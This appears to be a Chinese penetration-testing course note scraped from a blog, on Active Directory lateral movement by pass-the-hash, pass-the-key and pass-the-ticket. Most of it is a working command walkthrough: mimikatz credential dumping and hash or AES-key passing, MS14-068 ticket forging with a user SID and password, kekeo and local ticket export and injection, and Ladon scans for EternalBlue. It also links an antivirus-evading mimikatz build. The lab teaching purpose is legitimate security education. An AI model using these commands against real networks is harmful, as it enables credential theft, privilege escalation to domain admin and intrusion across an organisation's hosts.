第68天-内网安全-域横向 PTHPTKPTT 哈希票据传
思维导图
知识点
Kerberos 协议
具体工作方法,在域中,简要介绍一下:
- 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket)
- 将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读
取 kerberos 中 TGT 数据 - 然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服务)票证,并且对 TGT 进行检测。
- 检测成功之后,将目标服务账户的 NTLM 以及 TGT 进行加密,将
加密后的结果返回给客户机。
PTH
PTH(pass the hash) 利用 lm 或 ntlm 的值进行的渗透测试。
PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。
如果禁用了 ntlm 认证,PsExec 无法利用获得的 ntlm hash 进行远程连接,但是使用 mimikatz 还是可以攻击成功。
对于 8.1/2012r2,安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys 代替 NT hash 来实现 ptk 攻击。
总结:KB2871997 补丁后的影响
pth:没打补丁用户都可以连接,打了补丁只能 administrator 连接
ptk:打了补丁才能用户都可以连接,采用 aes256 连接
https://www.freebuf.com/column/220740.html
PTK
PTK(pass the key) 利用的 ekeys aes256 进行的渗透测试
PTT
PTT(pass the ticket) 利用票据凭证 TGT 进行的渗透测试。
PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种常见的攻击方法:
- MS14-068
- Golden ticket
- SILVER ticket
简单来说就是将连接合法的票据注入到内存中实现连接。
MS14-068 基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)其中 Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术。
MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780
演示案例:
域横向移动 PTH 传递-Mimikatz
案例 1-域横向移动 PTH 传递-mimikatz
PTH ntlm 传递 未打补丁下的工作组及域连接
#域连接
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
#工作组连接
sekurlsa::pth /user:administrator /domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c
#在实战中,本地用户与域用户,都尝试连接一下
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
\\OWA2010CN-God.god.org
privilege::debug
sekurlsa::logonpasswords
当获取到域内一个主机的权限之后,可以使用mimikatz运行sekurlsa::logonPasswords命令获取其LM和NTLM。
注意:Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。由于目前大部分主机系统都很新,所以一般我们收集的都是NTLM数据,但是也不排除内网中有老系统,所以在信息收集的时候,最好LM和NTLM都收集一下。
LM :e90127c07127ed12f4ebf668acca53e9
NTLM :518b98ad4178a53695dc997aa02d455c
当收集到NTLM数据后,很有可能内网中有其他主机的NTLM值与我们收集到的一致。此时我们就可以使用NTLM进行内网横向渗透。
运行以下命令,域横向移动PTH传递,攻击未打补丁下域内主机,其中ccef208c6485269c20db2cad21734fe7是前期信息收集时收集到的NTLM值。
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth/user:administrator /domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c
弹出一个新的cmd框,只要弹出框,就说明这个域内主机与我们收集到的NTLM值相同。接下来我们就可以进行at schtasks 复制文件、执行文件等其他操作了。
dir \\OWA2010CN-God.god.org\c$
dir \\192.168.3.21\c$
域横向移动 PTK 传递-Mimikatz
PTK aes256传递 - 打补丁后的工作组及域连接:
因为PTK传递需要一个前提条件,主机必须打了补丁kb2871997。
在实际上,PTK传递比PTH传递用的少。
sekurlsa::ekeys 获取aes256值
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
获取aes256值
PTK传递(这里使用的是本机的aes256,仅做操作演示)
域横向移动 PTT 传递-MS14068&kekeo&local
案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地
第一种利用漏洞:
MS14-068 powershell 执行,能实现普通用户直接获取域控 system 权限
- MS14-068下载:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
whoami/user
查看当前 sid
S-1-5-21-1218902331-2157346161-1782232778-1124
mary就是域内一个普通用户
2.清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
klist //查看当前机器凭证klist purge//清空当前机器中所有凭证
3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
.\MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票据注入内存
./mimikatz.exe
kerberos::ptc TGT_mary@god.org.ccache
exit
5.查看凭证列表 klist
6.利用
dir \\192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$
第二种利用工具 kekeo
- 工具kekeo下载:https://github.com/gentilkiwi/kekeo/releases
1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用
dir \\192.168.3.21\c$
第三种利用本地票据(需管理权限)
因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗。
缺点:票据是有有效期的,一般为10小时,所以如果当前主机10h之内连接过域控的话,我们可以利用该票据,但是如果超过10h,就没法利用。
导出本地票据(需管理权限)到当前目录
sekurlsa::tickets /export
导入票据
kerberos::ptt xxxxxxxxxx.xxxx.kirbi
利用票据
总结:ptt 传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据
国产 Ladon 内网杀器测试验收-信息收集,连接等
信息收集-协议扫描-漏洞探针-传递攻击等
github:Release Ladon 911
官网:http://k8gege.org/Ladon/
具体用法请查看官网wiki,举例如下
Ladon.exe 192.168.1.8/24 OnlinePC 扫当前机器所处C段的存活主机,其它模块同理
Ladon.exe 192.168.1.8/24 OsScan 扫当前机器所处C段操作系统版本,其它模块同理
Ladon.exe 192.168.1.8/24 MysqlScan 扫当前机器所处C段的ssh端口,其它模块同理
Ladon 192.168.1.8/24 MS17010 扫当前机器所处C段的永恒之蓝漏洞,其它模块同理
参考:https://www.cnblogs.com/zpchcbd/p/11944486.html
涉及资源:
https://github.com/gentilkiwi/kekeo/
k8gege/Ladon: 大型内网渗透扫描器
解压密码:k8gege.org
MS14-068
https://github.com/ianxtianxt/MS14-068/blob/master/MS14-068.exe
暗月免杀mimikatz
链接:https://pan.baidu.com/s/1erHWNWQ6roVWTKNkdWsffg?pwd=uy5q
提取码:uy5q
参考
https://www.cnblogs.com/zhengna/p/15320256.html
第68天-内网安全-域横向 PTHPTKPTT 哈希票据传相关推荐
- 内网安全-域横向PTHPTKPTT哈希票据传递
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the ke ...
- 内网安全 - 域横向 PTHPTKPTT
域横向 PTH&PTK&PTT 基础知识 域横向移动PTH传递-Mimikatz 域横向移动PTK传递-mimikatz 域横向移动 PTT 传递-MS14068(主要)&ke ...
- 内网安全-域横向批量atschtasksimpacket
目录 0x01 横向渗透明文传递 1.1 渗透流程 1.2 IPC技术 1.3 [at] & [schtasks] 1.3.1 假设已经找到DC的用户名密码(具体后面再详细讲),由于域控DC ...
- 内网域横向PTHPTKPTT哈希票据传递
内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...
- p66 内网安全-域横向批量atschtasksimpacket
数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...
- 【内网安全】域横向PTHPTKPTT哈希票据传递
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...
- 【内网渗透】域横向PTHPTKPTT哈希票据传递
目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...
- 第69天-内网安全-域横向 CobaltStrikeSPNRDP
思维导图 知识点 演示案例 域横向移动RDP传递-Mimikatz 除了之前讲到的IPC,WMI,SMB等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议进行连接操作. RDP 远程显 ...
- p69 内网安全-域横向 CobaltStrikeSPNRDP
数据来源 SPN(Secret Private Network缩写)_百度百科 (baidu.com) 演示案例 域横向移动RDP传递-Mimikatz 域横向移动SPN服务-探针,请求,导出,破解, ...
- 内网安全-域横向smbwmi明文或hash传递
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况 ...
最新文章
- python 两台机器之间传递数据_Python:通过套接字在两台计算机之间发送数据
- linux 查看历史打印,2019-02-01 Linux查看用户/历史命令
- 自旋锁/互斥锁/读写锁/递归锁的区别与联系
- 画出计算机网络的一般组成,计算机网络习题(有答案).pdf
- 必须在构造函数基/成员初始值设定项列表中初始化
- GPU Pro 2 ------ Volume Decals
- java lang保_java中lang包下的类都涉及哪几方面的
- JVM系列:生产环境参数实例及分析【生产环境实例增加中】
- 专网解决方案:中兴以全光园区解决方案打造智慧园区
- new_picview_PicView图片浏览器
- U校园大学生必备答案
- PCB需要清洗的技巧
- 200个计算机局域网适合什么,批处理检测局域网电脑是否开机(200多台电脑,不同网段,最好按主机名称检测)...
- Reducing Participation Costs via Incremental Verification for Ledger Systems学习笔记
- gbd调试器及静态库/动态库的制作
- ctextart类的文档仅仅首页修改页眉
- 百度地图-初步的地图创建和标识
- 谷歌学术we are sorry/拉黑/报错自动查询过多
- 如何更改Linux的ip地址为静态ip(附克隆主机需要做的更改)
- NORDIC Thingy:52 蓝牙 BLE 服务 SoC 程序调用流程分析之八, 网盘分享 PPT
热门文章
- windows下使用labelImg标注图像
- oracle修改asm参数文件,修改asm中的spfile参数
- centos 常用的网络登录端口测试工具
- 先锋linux 64位安装包的安装使用
- matlab基础(一):matlab中矩阵的基本运算
- 百战程序员python视频下载_[视频教程] 百战程序员python400集(第一季115集)
- 日语毕业论文日文参考文献怎么找?
- inode对接微软服务器,H3C iNode智能客户端安装指导(Windows)-7.3-5PW102
- 让大家在30分钟内完成APPLEALC的声卡仿冒
- FTP连接成功但是无法显示目录的解决方式